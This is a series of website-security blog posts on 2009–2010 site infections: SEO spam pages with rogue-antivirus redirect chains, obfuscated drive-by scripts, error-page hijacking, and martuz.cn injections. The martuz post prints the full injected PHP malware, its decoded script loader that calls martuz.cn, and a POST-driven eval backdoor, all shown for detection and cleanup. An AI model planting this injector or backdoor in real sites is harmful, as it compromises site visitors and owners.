By

The recent "Movie Review" infections

Over the past week, we’ve been seeing a lot of infected websites that are ranking for various movie review web pages – and these sites have nothing to do with movies!

The typical infection is a five letter .php file such as:

  • juqip.php
  • kirqf.php
  • wxtrg.php
  • mtywo.php
  • tijox.php

And other file names. The common denominator here is the five letter file name. From what we’ve seen the file name doesn’t start with a vowel and it appears there is a different file name for each website. If you were to Google tijox.php you’ll only see it on one website.

For each of these sites, there is a folder named “./files”. The reason for the dot before the folder name is to hide it from many programs. For instance in the FTP program I use WS_FTP by Ipswitch, you have to specify that you want to see all listings that begin with a dot. By default, in WS_FTP, this folder won’t even show. The same is true for Linux. You won’t see the folder that begins with a dot.

All the files in the “./files” folder are put there by the hackers. The majority of them are movie reviews, but there’s also .html files in there about the Buffalo Sabres hockey team, various “Lord of War” files, Texas Lottery Pick 3 and various other frequently searched terms.

We have seen a lot of them using search terms that reference “lord of war”, but other search terms used are:

  • 3 10 To Yuma Soundtrack
  • death of a cheerleader wiki
  • tx lottery pick 3
  • sabres hockey
  • strike force results hershel walker
  • strike force nashville presale code
  • kesha snl
  • strangers on a train movie
  • knights templar
  • freshman fall imdb
  • dazed and confused cast
  • strangers on a train patricia highsmith
  • luci baines johnson pictures
  • bernadette protti pictures
  • dan henderson vs jake shields fight video
  • kelly pavlik news
  • the good shepherd imdb
  • acm awards 2010 voting
  • doctor who victory of the daleks download
  • dazed and confused lyrics
  • amstel gold race 2010
  • roma airport
  • farley granger imdb
  • tao las vegas
  • mastiff
  • josh selby basketball
  • king mo vs mark kerr
  • pavlik vs martinez undercard
  • american bulldog
  • kelly pavlik vs miguel espino
  • kelly pavlik wiki
  • sergio martinez next fight
  • joe mather girlfriend
  • batman and robin comic
  • bernadette protti
  • guillain barre syndrome wikipedia
  • shake weight reviews does it work
  • strikeforce results january 30
  • the hitcher movie
  • psn code generator
  • amanda peterson photos
  • elearning
  • tea leoni
  • patrick dempsey
  • unemployment
  • and many, many others

However, the real interesting information is in the query string. The query string has the “?” after the .php file name, and then it uses a variety of identifiers. Sometimes it’s a single letter other times we’ve seen words like;

  • sell
  • in
  • post
  • off
  • do
  • topic
  • page
  • pageid
  • go

these are followed by the search term. In the search term the spaces are converted to %20 possibly to further try and obfuscate their work.

We found that the majority of sites with this infection have already been found by Google and labeled, “this site may harm your computer”. Unfortunately not all of them have been flagged yet. I say unfortunately, because it seems as though that’s the way most website owners or webmasters find out that a website has been infected – by Google flagging it and sending an email to the email addresses listed in the Google Webmaster Tools.

If you were to Google, “the hitcher movie”, many listings appear that have the warning this site may harm your computer. Some don’t. Anyone looking to find information about “the hitcher movie” might click on one of the sites that hasn’t been labeled by Google yet and here’s what would happen.

First, inside the “./files” folder, there is typically a file named “b.log”. This file contains the website that these files redirect to when clicked on only from a Google Search Results Page (SERP).

For instance in one investigation the b.log file looked like this:

kqx7ea.xorg.pl|1271657010

Anyone clicking on a Google SERP for this particular website would be directed to:

http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN http://kdsproductions.com/ekctj.php?p=the%20hitcher%20movie

Which then redirects to:

http://www4.nomikals2.com/?p=p52dcWltbV%2FRlsijZFaZp29e2KHObWOXk5ecmmFoZG6a http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN

Which redirects to:

http://www2.scanprotection34p.net

Which wants to install a fake (rogue) anti-virus program on your PC.

What to look for

Look in your root folder for your website. It might be public_html or just html. Look for any .php files that have five letters that look totally random. From what we can tell, they are totally random. Then make sure that your FTP software is showing hidden files and folders. Look for a folder named “files” and see if there aren’t a whole lot of .html files in there that you’re quite certain, you didn’t put there.

What to do

If you do find these instances on any of your websites, remove the ./files folder and the five letter randomly named .php file. There may also be .php files installed in your images folders. Search all files for the string:

eval(base64_decode( followed by a long list of characters. Don’t just delete this file, but examine it. If you need help decoding it, please email at: traef@wewatchyourwebsite.com

In all our cases, we’ve found that the culprit was a virus on a PC with FTP access to the infected website. We’ve seen the FTP logs and we’ve identified the IP addresses that some of these files came from.

As with many website infections, the first step is change all FTP passwords and do not save them on any PC – yet.

Then obviously remove all the files identified above.

Next, install a different anti-virus program on your PC. The reason is that these viruses and trojans know how to evade detection of the anti-virus program that’s already been installed when the virus first infected the PC. In order to find and remove the viruses you have to install a different anti-virus program.

Many have had good success with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software). If you’re already using one of these, then try one of the other two – it has to be different.

Once you’ve found and removed the virus or trojan, you can then use your FTP program with the new passwords and feel safe.

The last thing to do is to Request a Review from your Google Webmaster Tools – if your site has tagged with the warning this site may harm your computer.

All of our clients prevented this warning by our monitoring service. While we couldn’t prevent their PCs from getting infected, we could detect when their websites changed. We immediately removed the files and alerted them to take the above steps to clean their PCs. Their websites were never blacklisted by Google because of our automated cleaning process.

If you’d like to be protected, please send me an email: traef@wewatchyourwebsite.som

If you have any comments, please feel free to register and let me know your thoughts or experience with this type of infection.

By

Another Round of Beladen? Or, The New "Go" Infection

On Wednesday July 22, 2009 we started seeing what looks to be a new round of beladen style website infections by cybercriminals.

The reason we think they’re beladen style is that they appear to infect all the websites on shared servers and they also seem to be remotely controlled with a “on as needed” mode.

This infection resulted in thousands more sites being tagged with Google’s “This site may harm your computer”.

According to Google Diagnostics for certain websites we were asked to help with, this is what was shown:

“Malicious software is hosted on 4 domain(s), including: ventsol.info/, ina6co.com/, goscansoon.com/.”

Other sites we were asked to help with were also showing these domains in their Google Diagnostics:

  • daobrains.info/
  • safetyshareonline.com/
  • goslimscan.com/
  • goscansome.com/
  • globalsecurityscans.com/

Our scanners were detecting suspicious obfuscated javascript on the sites we were helping with, but it appeared to only be setting cookies to expire the following day. The obfuscated javascript was this:

malscript-0-11

Which deobfuscated looks like:

sessionid=39128605A531; path=/; expires=Thu, 23 Jul 2009 18:42:32 GMT

We found similar code with various names for the “var” part (replacing oigmlob) above in the obfuscated code. Other names were:

  • dtxzidl
  • bmno
  • wcdg
  • tpet
  • stqfpbc
  • meuhgor

In addition, we also saw various combinations of the hexidecimal numbers to replace the actual letters. For instance, instead of pa\x74h=/\x3b ex\x70ir\x65s we found these as well:

  • p\x61th=/\x3b exp\x69r\x65s
  • p\x61\x74h=/\x3b \x65x\x70i\x72es
  • p\x61t\x68=/\x3b expi\x72e\x73

All of these deobfuscate to: path=/; expires

One common theme was the hosting providers. Wouldn’t you know that a day after we blog about how wrongly accused many hosting providers are for the gumblar, martuz and iframe infections that they actually become the target.

It appears that these recent infections are a server issue and not just a specific website on a shared server. How the server became infected is purely speculation. Could it have been from one set of compromised FTP credentials that was able to infect the server and then control other sites as well? Could it have been SQL injection for one site that then gave the attackers a method to start a process on the server thereby controlling all the websites on that server?

Who knows. At this point all we do know is that this does affect all the websites on infected servers.

How do we know that?

We created a program for situations like this. It grabs a list of all the websites for a specific IP address and starts checking them. On some IP addresses 91% of the websites were showing the obfuscated cookie code from above. Our thought is that since this is an “on again – off again” type of infection, the other 9% were dormant when our program scanned those sites.

Another interesting observation was that for a specific IP address, each website showed the exact same obfuscated code. While websites on different IP addresses had similar obfuscated code with the slight variations mentioned previously.

The first step in this “drive-by” infection was to set a cookie on the visitor’s PC. Then if that same visitor came back within the expiration period of the cookie (24 hours), this would be delivered to their browser:

malscript-1-1

Which essentially does a Meta tag redirect. The above deobfuscates to:

malscript-2-1

We did see some of the other domains mentioned earlier in place of safetyshareonline.com and the goscansoon.com.

The whole purpose of this attack is to infect the PCs of visitor’s to these websites. This is done with this bit of social engineering code:

malscript-3-1

This code uses some fake graphics (okay the graphics are real, but they’re not the “official” graphics of Microsoft) in an attempt to trick the visitor into believing they have a virus. The code starts by checking to see if the operating system on the visitor’s PC is Microsoft’s Vista. If it is, it displays “Vista” looking graphics. If not Vista, then it assumes Windows XP and shows different graphics.

No matter who you are or what operating system and browser you have, this code shows a window that looks like a “Windows Security Center” window and it informs you that:

 “Virus (I-Worm.Trojan.b) was found on your computer! Click OK to install System Security Antivirus.” If you select “OK” from their screen it will download their “antivirus”.

If you cancel, a new alert is displayed with this message:

 “Windows Security Center recommends you to install System Security Antivirus.”

If you cancel that, it will display again.

One more cancel gets you to this message:

“Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it to secure your PC”

This is some very elaborate scheming by hackers and cybercriminals just to get visitors to download their “mother lode of infectious code”, but it will probably work on many people.

We decided to show the code here, although the code is inserted graphic files, so that if your website starts being tagged as suspicious by Google with some of the domains listed here, and you get the “This site may harm your computer” moniker, you can compare this code to some of the code you might see in your site and have a better understanding of what is going on.

What To Do

First you need to contact your hosting provider. Have them read this blog post so they can also better understand what’s going on.

Have them check at the server level for unusual processes running on the server. If you’d like, have them contact us and we can help them diagnose this further. We can show them the other websites on your server that are also infected with the exact same code.

At this point we still don’t know how the server gets infected. Be prudent and scan your PCs with a different anti-virus than what you’re currently using. Why? Because if you are infected and you have anti-virus already installed, then it’s obvious that the virus knows how to evade detection of your current security.

We’ve had good success with AVG, Avast or Avira. If you already have one of those installed, then use one of the others. You need to use something different. Scan and clean all PCs with FTP access to your site.

Then change FTP passwords on all of your accounts.

This will have to be done as soon as you start seeing these infections as it may take some time to fully investigate and remediate – so don’t be late (sorry, it’s been a long few days).

Post comments below if you’ve been infected by this or know someone who has.

Thank you.

Friday July 24, 2009 update: We worked with a couple different hosting providers who had servers infected with this and it appears the way these malscripts are injected into the the webpages is through a process on the server. The cybercriminals have cleverly named this process “crontab” however this process runs under the user name “nobody” typically the same user name that Apache (or httpd) runs as.

The file that executes this process is remotely deleted by the cybercriminals controlling it so it just runs in memory. Once the server is rebooted, the process disappears and doesn’t appear to return. The hosting providers also mentioned implementing suPHP as an aid to blocking this from happening again.

This is quite clever as how many times does a shared server really get rebooted? Probably not very often unless there’s a reason to shut-down numerous (hundreds?) websites all at once.

Keep posted, we’ll be adding more information as we get it.

By

The Blame Game

Major Malware Outbreaks Evade Anti-Virus Protection

A report released on July 14, 2009 states that “Several successive and massive malware outbreaks caused a spike in malware that was undetected by major AV engines.”

In Commtouch’s Q2 Report available here , which covers the analysis of over 2 billion emails and Internet transactions, they also claim:

  • “Business” was the website category most infected with malware
  • An average of 376,000 new zombies were activated each day with malicious intent

Amir Lev, Chief Technology Officer of Commtouch said that for the last 18 months anti-virus (AV) engines used many generic signatures, which were effective at blocking malware. However, malware writers and distributors introduced new variants which are immune to these generic signatures.

This time period coincides with the infection of 1,000s of websites with gumblar, martuz and iframe malscripts which then received Google’s moniker of “This site may harm your computer.”

The Blame Game

Answering many, many blog and forum postings from disgruntled website owners and developers who’ve been the victim of these recent gumblar, martuz and iframe infections, it’s been our experience that quite often the thought process of the victimized website owner follows this path:

  1. The website owner or webmaster receives an email from Google notifying them that their site is infectious. Google rarely (if ever) is wrong so they immediately slap all SERPs (Search Engine Result Pages) with the “This site may harm your computer” label thereby stopping all traffic dead in it’s tracks.
  2. Cautiously the site owner or webmaster will try to view the site. They don’t want to become infected from their own site, but their curiosity is overwhelming. They typically don’t see anything malicious.
  3. “How do I find and clean this?” Often these people will post questions on sites like Google’s Webmaster Forums or www.badwarebusters.org or some other favorite online watering hole.
  4. Then their focus turns to, “Who’s to Blame?”

The feeling of many site owners is one of “I’ve been violated and I need to blame someone.”

When hacking victims get to “Who’s to blame”, they quite often turn their attention to their hosting provider. Many times the blogs and forums are filled with postings where people blame even some of the largest hosting providers. Site owners want to instantly spend the time and money to move their website to a different hosting provider where they’ll once again feel safe and secure.

All because they feel it’s the hosting provider’s fault their site, or sites, were hacked.

The site owner or developer will call the hosting provider looking for assistance from their technical staff and quite frequently, they can’t find the obfuscated malscript buried deep inside some harmless HTML code either. Many times the website has been blocked by various anti-virus programs, Google’s search results and sometimes even corporate website filters for days or weeks before the issue is resolved.

Even if the site owner goes through the trouble of moving to a new hosting provider, with these recent infections, their site will just get hacked again and again.

Then who’s to blame? The new hosting provider? How many more hosting provider’s will the site owner move to until they finally find one that gives them that safe and secure feeling?

Many site owner’s want the hosting provider to take responsibility and clean their site. After all, they’re paying their $5 – $10 per month so the hosting provider should take responsibility and the spend the time to clean the infectious website, right? No matter how many times the site gets re-infected.

Don’t Shoot the Messenger

I hate to be the one to break it to you, but, hosting providers had nothing to do with websites getting hacked with the recent gumblar, martuz or iframe injections. It was anyone’s fault but theirs.

It could be the site owner’s fault, or the anti-virus company’s fault, or Microsoft’s fault, or the fault of the company that wrote the FTP software being used.

It was almost anyone’s fault – except that of the hosting provider.

Let me explain.

You see, with all the malware that went undetected by these generic signatures, thousands of PCs were compromised. According to the Commtouch report referenced above, 376,000 new zombies per day.

You could blame Microsoft, however, the Commtouch report also shows an increase in the amount of Mac malware as well. Besides, blaming Microsoft is so 2,000 late.

These recent website infections came from viruses on the PCs of people who have FTP access to websites.

OMG!

Does that mean it could be the fault of the website owners, developers and webmasters?

It might, rabbit, it might.

These recent undetectable viruses steal FTP credentials – usernames and passwords. These viruses search through the files of popular FTP software looking for the file with the stored FTP credentials. These viruses also record keystrokes so when an infected PC is used to type in the FTP credentials, they get stolen. As another point of attack the viruses also “sniff” FTP traffic. Since FTP transmits all data in plain text, it’s easy for a sniffer to see the username and password in the FTP data stream and steal it. We even did a video to show how easy it is to sniff FTP traffic. It’s so easy that some people use a sniffer on their own FTP traffic if they forgot their stored password. Here’s our video.

Virus writers are incredibly smart and this round of malware proves it.

Once the virus has the FTP credentials it sends them to the server of a cybercriminal. This server is configured to login to the website as a valid user, inject it’s infectious code and move on to the next site.

Who’s to Blame?

How many websites did you visit that displayed some type of ad? Did you know that many ad networks have served up infectious ads – unknowingly of course, but nonetheless, the ads could have infected many visitors.

How many websites did you visit that displayed Flash intro’s or allowed you to view an Adobe Acrobat file (pdf)? Adobe had a few vulnerabilities in their software, that were exploited during and prior to this time period. Combine a vulnerability in files so widely used with the ineffective generic anti-virus signatures, and there’s another source to blame. Maybe two new sources – the AV companies and Adobe.

Did you update your Adobe products as soon as the update was available?

If not, then there’s another person to blame – you.

Could the companies that wrote the FTP software used, maybe have encrypted the stored usernames and passwords so that it wasn’t quite so easy to find and steal the FTP credentials? There’s anothe source to blame.

Maybe if so many people didn’t use their PCs with full administrator rights, there wouldn’t be such a virus outbreak in the first place. Maybe these PC owners are to blame.

Whoever you decide to blame, don’t incur the costs involved with moving to a new hosting provider before you find out what your site was infected with and how those infections occurred. You might be barking up the wrong tree.

I’ll tell you, the cybercriminals are to blame.

They’re the people who write and distribute viruses, malware and malscripts.

Cybercriminals (some call them hackers) want to control as many computers as they possibly can. They don’t care if it’s a computer for a university or if it’s the computer of a new Internet start-up company. One compromised computer looks just the same as another.

Compromised computers make up their inventory.

You know what a hacker calls an uninfected computer – opportunity!

Their digital assets are the computers they control. Often times some of their inventory of infected computers gets rented out to other cybercriminals. This provides them with a source of income.

If you really need to blame someone, blame the hackers, or the international cyber laws, or the world economy. Just don’t blame the hosting providers.

Hosting providers provide a very valuable service. Their margins are squeezed tighter and tighter as it seems everybody thinks it’s a great idea to enter the hosting industry. The good hosting providers work hard for their customers. They depend on customer retention and acquisition – just like every other business. They do the best they can with what they have.

The only thing a hosting provider could do to prevent these gumblar, martuz and iframe infections is to block all FTP traffic. Then you would have a very good reason to blame them for something, but you still wouldn’t be able to justify blaming them for the rash of website infections.

It simply isn’t their fault.

Let me know your thoughts on this. Who would you blame if your site got hacked? Who did you blame if your site was already hacked?

By

The Errors of Error Pages

Over the past few months, the number of sites infected with malscripts has increased dramatically. Many of these injection infections are difficult to track. Unbeknownst to many site operators, “error pages” can actually complicate the detection process. This blog posting discusses what we call “The Errors of Error Pages”.

Frequently, if you mistype a word in a URL, the “Page Not Found” error page is displayed. The very plain, non-descriptive message is not terribly user friendly in that it gives minimal information. The error code produced by a “Page Not Found” is a 404.

If you request a non-existent page on a Microsoft IIS webserver you might see something like this:

 404-iis1

Much has been written about preventing the typical “Page Not Found” error page from scaring away potential buyers. However, most of these marketing articles omit the critical discussion of how cybercriminals use these error pages to distribute their malware. This posting focuses on that topic.

The General Problem

When a site discloses Google’s moniker, “This site may harm your computer”, the user’s or host’s first response is to scan their website with anti-virus programs – rarely will this find the malscripts. Since Google prohibits the site from appearing as a normal search result while generating this message, the user aims to quickly find the injection infection. Once discovered, the site then seeks Google’s permission to reappear. We’ve handled many cases where everyone from the hosting provider, to friends, to the web developer, has checked “every file” and found nothing malicious on the site in question. Often, the error page is the source of the problem. However, they routinely fail to investigate the error pages – and cybercriminals know this.

Relevant Codes

To understand the criminal mind, one must first understand the various response codes generated by different requests. For example, when one uses their browser to request http://www.wewatchyourwebsite.com, the page actually exists. Therefore, the response code the browser receives is a 200. These codes don’t appear on the screen, but the browser sees them.

On the other hand, if one types in http://www.wewatchyourwebsite.com/fredflintstone.php, the browser would generate a 404 (Page Not Found) response code because there is no page with that name on the site.

To avoid a user receiving a 404 response, and the resulting “ugly” Page Not Found page, a website can be configured to generate a different response for those requests which would typically result in a 404 response code. Instead of a 404 response, you would see a page that’s been created to replace the “Page Not Found” response, or some substitue page that informs the visitor that the page they’ve requested has either moved or does not exist.

Use of Security Tools

In our work, we’ve tested various tools, vulnerability scanners, exploit engines, etc. seeking a vulnerable script file or software exploit, and found that if the tool sends a request to a website that generates a response of any kind, often times the tool considers the exploit successful. However, if the website being tested is setup to return a custom error page rather than the basic “Page Not Found” page, the security tool will record that attempted exploit as successful, thus, rendering a false positive.

For example, a security tool may be used to check for a vulnerable version of some shopping cart software. If the website being checked is set up to return a customized 404 error page, the security tool will see that it generated a webpage response to it’s request for the vulnerable shopping cart URL. If the tool detects a webpage in response to it’s check, the tool will assume that the site must have the vulnerable version of the shopping cart software – a potentially false positive.

Since hackers know that false positives arise under these circumstances, when they infect a website, they inject their infectious code into the default error pages. As cybercriminals also know, frequently, these pages are neglected by those working to detect infections on websites.

Clues to Find and Methods for Searching

Knowing all of this, during a search for infections, we always check for fredflintstone.php. (When we start seeing websites with a webpage with this name, we might switch to betty.php, wilma.html, barney.cfm or dino.asp.) Nevertheless, by checking for pages that we know don’t exist, we are confident that we have scanned for this obvious point of infection, and thereby detected possible cybercriminal activity.

Further, many shared hosting services use a folder off of the root folder named something like “error_docs”. Often, the hosting provider will fill that folder with basic webpages that a site uses as responses when visitors request webpages they aren’t allowed to see or simply don’t exist. Sometimes these files will be named with the response code, e.g. for a “Page Not Found” error the resulting webpage might be called 404.html. Other times, the webpage will be called by the error name it’s produced by – like “page_not_found.html” for a 404 response code.

Every host or site owner should determine how their site handles these different responses and check those files for any malscripts. At the end of this article, we suggest a valuable tool to conduct such checks.

More Examples

In the course of our work, we recently discovered a rather ingenious way of delivering malscripts through the use of 404 error pages. Apache Web server software can be configued differently to a request for a webpage that doesn’t exist.

One basic response is in the configuraton file: httpd.conf, and it would look like this:

  • ErrorDocument   404   /404.html

If you’re on a shared hosting plan (you’ll know if you’re not), you probably (hopefully) don’t have access to this file. But you will have access to .htaccess (yes there is a period in front of that file name). This file might also have the same entry for ErrorDocument listed in there.

How do hackers use this to infect visitors to one of their distributional assets?

One of two ways.

First, they can see what file is used for the 404 (or other such response codes) and inject their malscript into that page. This can be found during a scan of the files residing on the webserver.

Or, they can instead insert their own malicious URL replacing the /404.html in the line ErrorDocument…

Instead of this: ErrorDocument    404    /404.html

They would put: ErrorDocument    404   http://hackerswebsiteinsertedhere

That way when someone scans all the files with a search tool, it won’t find the malscript because the malscript isn’t in any of the files located on that server. It’s located on a server miles away.

This is why it’s always important to know how a site is handling 404’s and other errors. The specific method used by the hosting provider must be checked. Any suspicious looking should be checked and verified.

As hackers become more sophisticated, website owners and developers must as well. Therefore, while the hackers increase their attempts to infect websites, so too, must we all increase our efforts to detect and to block them.

How can you check your site?

I recommend a tool I learned about from Kaleh (a moderator on www.badwarebusters.org and a frequent contributor on Google’s Webmaster forum). The tool is a website: http://web-sniffer.net. Simply, enter a URL in the box at the top, add “/fredflintstone.php” (no quotes) to the end of it, and hit “Submit”.

Scroll down to the bottom of the screen to see what HTML/code the site sends to a visitor’s browser when they request a page that doesn’t exist (404 error).

If you see something that looks out of place, you should suspect that code, research it and possibly remove it. If you ever have any doubts, please contact me and I’ll review it for you. We have deobfuscation tools available and can usually determine what a piece of obfuscated script is really doing.

Should you have any questions or wish to continue this discussion, please post your comments below or contact directly at traef@wewatchyourwebsite.com

Thank you.

By

A New Spin on martuz Website Infection

We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was an infectious website delivering malicious code with an email from Google.

This website owner had tried removing the code himself from the infected webpages and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome,  were greeted with a big warning:

This site may harm your computer.

After about a week of trying to rectify the problem himself, he contacted us.

He provided us FTP access to his site so we could tackle it.

After downloading his site (which literally took 3 hours) we started scanning. We grep’d for the word “base64_decode” and found over 228 php files all with the following malscript:

(php tag removed) if(!fun ct ion_ex ists(‘tmp_lkojfghx’)){if(is set ($_POST[‘tmp_lkojfghx3’])) eval($_POST[‘tmp_lkojfghx3’]) ;if(!defined(‘TMP_XHGFJOKL’))
define(‘TMP_XHGFJOKL’,b ase64_de cod e(‘PHNjcmlwdCBsYW5ndWFnZT 1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBWaXRMPSclJzt2YXIgU3VvPSd2YXJfMjB
hXzNkXzIyU2NyaV83MHRFbmdfNjluZV8yMl8yY2JfM2RfMjJWZXJzaV82Zm4oKStfMjJfMmNqX zNkXzIyXzIyXzJjdV8zZG5hdl82OWdfNjF0XzZmcl8yZV83NV83M182NXJfNDF
nZW50XzNiaWYoXzI4dV8yZWluZGV4T2ZfMjhfMjJfNDNocl82Zl82ZGVfMjIpXzNjXzMwXzI5XzI2 XzI2KHVfMmVpbmRfNjV4T2YoXzIyV182OV82ZV8yMilfM2UwKV8yNl8yNl8
yOHVfMmVpbmRleF80Zl82Nl8yOF8yMk5UXzIwNl8yMilfM2MwKV8yNl8yNihfNjRvY183NW1fNjV uXzc0XzJlXzYzb29rXzY5ZV8yZWluXzY0ZXhPZihfMjJtaWVrXzNkMV8yMil
fM2NfMzApXzI2XzI2KF83NHlwZW9fNjYoXzdhXzcyXzc2enRzXzI5XzIxXzNkdHlwXzY1b182NihfMjJ BXzIyKSkpXzdienJfNzZ6Xzc0c18zZF8yMkFfMjJfM2Jldl82MWwoXzI
yaWYoXzc3aW5kXzZmd18yZV8yMithXzJiXzIyKWpfM2RqK18yMitfNjErXzIyXzRkYWpvcl8yMl8yY mIrYStfMjJNaW5vcl8yMitiK2ErXzIyQl83NWlfNmNkXzIyXzJiYitfMjJ
qXzNiXzIyKV8zYmRvY183NW1fNjVfNmVfNzRfMmV3cml0ZShfMjJfM2NfNzNfNjNyaV83MF83NF8y MHNfNzJjXzNkXzJmXzJmbWFyXzIyK18yMl83NF83NXpfMmVfNjNuXzJmdml
kXzJmXzNmXzY5ZF8zZF8yMitfNmErXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2Qn O2V2YWwodW5lc2NhcGUoU3VvLnJlcGxhY2UoL18vZyxWaXRMKSkpfSk
oKTsKIC0tPjwvc2NyaXB0Pg==’));fu nc tion tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(su bstr($s,10,-8));
if(preg_match_all(‘#<script(.*?)</sc ri pt>#is’,$s,$a))for ea ch($a[0] as $v) f(count(exp lo de(“\n”,$v))>5)
{$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_m atch(‘#[\(\[](\s*\d+,){20,}#’,$v);
if((pr eg_match(‘#\beval\b#’,$v)&&($e||str pos($v,’from Char Code’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}
$s1=preg_re pl ace(‘#<sc ri pt lan gu age=java scri pt><!– \n\(fun ct ion\(.+?\n –></script>#’,”,$s);if(stristr($s,'<body’))
$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,'</body’)||stristr($s,'</title>’))
$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0) {$s=array();

if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d); foreach(@ob_get_status(1) as $v)
if(($a=$v[‘name’])==’tmp_lkojfghx’)re t urn;else $s[]=array($a==’default output handler’?false:$a);
for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)
$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2(); ?>

The base64_decode section evaluates to this:

<script language=javascript><!–

(f u n c t i o n(){var VitL=’%’;var Suo=’var_20a_3d_22Scri_70tEng_69ne_22_2cb_3d_22Versi_6fn()+_ 22_2cj_3d_22_22_2cu_3dnav_69g_61t_6fr_2e_75_73_65r_41gent_3bif
(_28u_2eindexOf_28_22_43hr_6f_6de_22)_3c_30_29_26_26(u_2eind_65xOf(_22W_69_6e_22) _3e0)_26_26_28u_2eindex_4f_66_28_22NT_206_22)_3c0)_26_26
(_64oc_75m_65n_74_2e_63ook_69e_2ein_64exOf(_22miek_3d1_22)_3c_30)_26_26(_74ypeo _66(_7a_72_76zts_29_21_3dtyp_65o_66(_22A_22)))
_7bzr_76z_74s_3d_22A_22_3bev_61l(_22if(_77ind_6fw_2e_22+a_2b_22)j_3dj+_22+_61+_ 22_4dajor_22_2bb+a+_22Minor_22+b+a+_22B_75i_6cd_22_2bb+_22j_3b_22)
_3bdoc_75m_65_6e_74_2ewrite(_22_3c_73_63ri_70_74_20s_72c_3d_2f_2fmar_22+_22_ 74_75z_2e_63n_2fvid_2f_3f_69d_3d_22+_6a+_22_3e_3c_5c_2fscrip_74_3e_22_29_3b_7d’;
e v a l(un esc ape(Suo.replace(/_/g,VitL)))})();
–></script>

Which deobfuscates to:

var a=”S cri ptE ng ine”,b=”Version()+”,j=””,u=na vi g ator.user A gent;if((u.indexOf(“Ch rome”)<0)&&(u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6”)<0)&&
(do cu ment.coo kie.ind exOf(“miek=1”)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=”A”;ev al(“if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);
doc um ent.w ri te(“<sc ri pt src=//mar”+”tuz.cn/vid/?id=”+j+”><\/script>”);}
if(window.Script Engine)j=j+ScriptEng ineMajorVersion()+ScriptEng ineMinorVersion()+Scrip tEngine BuildVersion()+j;
<script src=//martuz.cn/vid/?id=></script>

a typical martuz infection.

Using PowerGrep we did a search and replace on this text and replaced every occurrence with “”.

We dug further into the files returned with our search for the word “base64_decode” and found 2 php files in every folder name “images”. These 2 files were named “image.php” and “gifimg.php” and inside each was the following code:

(php tags removed) eval(base64_decode(‘aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb J2UnXSkpOw==’)); (php tags removed)

Which decodes to:

if(isset($_POST[‘e’]))eval(base64_decode($_POST[‘e’]));

Which just decodes whatever text string is POST’d to this file.

To test, we encoded some commands and setup a little script to POST to this form with our commands. It worked!

In addition to these 2 files we found many others in various folders that contained the same code. We’re working on determining how these files are named. It almost seems random, but in order for this to be an automated process we feel that there must be some algorithm in creating the file names. Otherwise, the cybercriminals would have to keep a database or list of each site name and the file name associated with that site. This is highly unlikely as they are into automated routines and keeping a list like that just doesn’t make much sense.

Being that this was martuz, we felt confident in recommending that the client change from FTP to either FTPS or SFTP and then scan their PC fully before accessing the site again. With this new twist of having these php files accept scripts and run them, we are concerned about this new form of infection.

We have seen some people report that you have to replace these php files with an empty file of the same name. That might be the case in some situations, none that we’ve seen, but that would require that the cybercriminals had another file on your site that monitored those files. That monitoring program needs to be found and eliminated.

Another interesting thing about the file names is that WordPress installations have files named image.php obviously with different code, but that tactic might be to deter people from just “willy nilly” deleting those files.

Stay tuned as we have many, many more websites to clean. We’ll be reporting on them as we obtain more information.

By

How To Find martuz.cn in Websites

After our post earlier today about how martuz.cn is the new domain for gumblar infections, we’ve received hundreds of emails from people (I guess too embarassed to post their question in an open forum), asking how to find martuz.cn in websites.

We’ll use a utility program called wget. Wget allows you to download the “raw” webpage from a site. It’s used quite heavily in the Linux world, but there is also a version for Windows users.

You can download wget from here: http://gnuwin32.sourceforge.net/packages/wget.htm

I recommend you select the Complete Package, except sources.

Download it, install it – you can just accept all of the defaults.

Now open a command prompt (Start->Run->cmd->OK).

Change directories like this: cd \”Program Files\GnuWin32\bin” <enter>

Let me explain a little about the options we’ll use with wget.

Sometimes these infectious malscripts like martuz.cn will only show themselves when viewed with a specific browser. In the recent days, martuz.cn won’t activate if you visit one of their infectious websites with Google Chrome as your browser. To be sure, we’ll set our user agent (which is what gets checked for your current browser) to Internet Explorer on a Windows XP computer.

